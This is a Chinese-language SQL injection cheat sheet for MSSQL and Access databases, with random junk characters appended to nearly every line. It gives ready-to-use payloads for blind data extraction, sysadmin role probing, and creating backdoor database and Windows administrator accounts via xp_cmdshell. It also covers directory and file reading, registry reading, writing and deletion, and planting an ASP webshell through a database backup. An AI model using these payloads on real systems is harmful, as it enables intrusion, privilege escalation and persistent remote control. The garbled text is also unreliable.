1.判断是否有注入;and 1=1 ;and 1=2 {7��$c8��i
2.初步判断是否是mssql ;and user>0 k� �*Q<3@S
q�p�/v^$EA
3.注入参数是字符'and [查询条件] and ''=' 9/hr�jIt�V
OlAs'T��E^
4.搜索时没过滤参数的'and [查询条件] and '%25'=' �Q?3Gk%T0[
�Q�k�\A
�c
5.判断数据库系统 \=uKH�NP?#
�?*E'^~,H)
;and (select count(*) from sysobjects)>0 mssql t"�k*�P�A
-�M[$Z�y�^
;and (select count(*) from msysobjects)>0 access G]fRk�^��~
2�9!q!g��|
?��%`@ub�$
v'VD0�+3[H
6.猜数据库 ;and (select Count(*) from [数据库名])>0 -�sw��
� .
\�<y`!"c
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 Fe]�B�&�n�
x*��?x=^I{
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 �,1��7hGKM
>+�]_5�qc�
9.(1)猜字段的ascii值(access) wW#}:59}��
)+}]+xRWGj
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 R��Ok5]b�.
O)� WC�W<p
(2)猜字段的ascii值(mssql) XLAN Np%E�
�FP�;Ccl"s
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 �s0D��GC�
jJuW-(/4[�
10.测试权限结构(mssql) Q�.]}]QE
�
��c8L~S/�t
%7"X(Ts7�B
�cJ1#ge�%4
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- 3E>fr�R\!I
�&K/ya�7�
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- �qjf�[zF�
} w
5�l���
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- ?R��K]FP"A
HRi�L.��DS
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- <F�WF�<r3F
��7RUofcax
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- �ZJw���rLV
m9"�n4a|:
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));--
T9]H�GB�{
�
��/o[�?D
;and 1=(select IS_MEMBER('db_owner'));-- ��wQwQX�NG
|g
#K��]v
9�[��m6L�i
mf}O-Igt�e
11.添加mssql和系统的帐户 t�?9v�^vFR
�q�~�3,yyu
;exec master.dbo.sp_addlogin username;-- |�4�T�!&[r
;exec master.dbo.sp_password null,username,password;-- �E-I-0h�2
0%�m)@ukb�
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- ��$% 1vW=d
<Wp
�QbQM�
;exec master.dbo.xp_cmdshell 'net user username password ��ow_djv:,
Bx�/��L<J@
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- �{@tv>�!WW
4?-.Z�UT-1
;exec master.dbo.xp_cmdshell 'net user username password /add';-- $OP7l>K�ZY
)('�%R|$ /
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- T}"�6w�ywM
L
]w/P��|�
�GDD '[�;�
.h9l7
nZt�
12.(1)遍历目录 ��"�)V130<
b|+wc�6�
�
;create table dirs(paths varchar(100), id int) 2Z3('?\z�~
U�2`'q�sR1
;insert dirs exec master.dbo.xp_dirtree 'c:\' Q5�F�M�8Q�
�^my].Qpt�
;and (select top 1 paths from dirs)>0 *cC�_j*1�@
rFC�"�� Jx
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) "g'�jPwF�G
�J�41G&$j(
e��46/{4F,
<
V\I���~;
(2)遍历目录 ���(rkU)Q�
wc!o�nZ�X5
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- �L+'��Fs�
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 xo&�]RYG[<
W��2z*9�1$
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 o��x%9��Ph
�N_p�Jk2E�
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 1qf!DMcdZ�
(i�R��ide
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 I� �=1�+h
�/w]!�wM
<<i3r|�}��
BQ @hun�s3
13.mssql中的存储过程 �T'�L�I�rf
sgO'�wXcoP
xp_regenumvalues 注册表根键, 子键 dw� �TMq*e
I(�'Un@hS�
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 �Rr!Y3)�f;
7��^Ns&Q��
xp_regread 根键,子键,键值名 v{��9t]s>B
X`fn8~5��
;exec xp_regread C&6IU8l�\�
XK: 9r{r{
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 M?[h0{�^K
^b�7�GH9<&
xp_regwrite 根键,子键, 值名, 值类型, 值 r�t�L}W__�
.N*P�l(<[�
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 VMCLHp�SfW
({NAMc���*
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 k��i�Ra+w:
=IUUeFv +r
xp_regdeletevalue 根键,子键,值名 !��>>f(t�4
%s�&ChM?8F
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 �>�-O/U5<!
x�Y$iz)^0&
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 Y�}[�c^$S�
<}sq?S�fq!
;��>A�L`M+
�1�?| f�lK
14.mssql的backup创建webshell 0
s��7�0r
2h�ee./F`�
use model wN2�QK6Oc
O)Y?=G)�
create table cmd(str image); 3�;�8!r�NN
Zv�UC���I8
insert into cmd(str) values (''); Y�&
F=t/U2
&`fh��E�N�
backup database model to disk='c:\l.asp'; {&"L�~�>/o
(I@rLvZr{�
t�OOchu?=�
iC�*�F����
15.mssql内置函数 [xT�:]Pw}�
EZYB�e�qv�
;and (select @@version)>0 获得Windows的版本号 9�
�Rx�
�s
0d3+0��EN{
;and user_name()='dbo' 判断当前系统的连接用户是不是sa gd0Vp Xf'�
|,aG�%MTL
;and (select user_name())>0 爆当前系统的连接用户 �1�]}#��)-
Y2O"]ph�i@
;and (select db_name())>0 得到当前连接的数据库 ;���/0 Q1-
!�o>H1#�2l
�/[9���t�`
e5OsI�Vtjr
16.简洁的webshell �n�wN�@DqO
/�"?HZ�% W
use model o��X4q`�rt
~`D�|IWMDq
create table cmd(str image); Z�(ZiFPx2Z
?�]�rPRV��
insert into cmd(str) values (''); b�]7GmRekl
/RyR��>�G!
backup database model to disk='g:\wwwtest\l.asp';
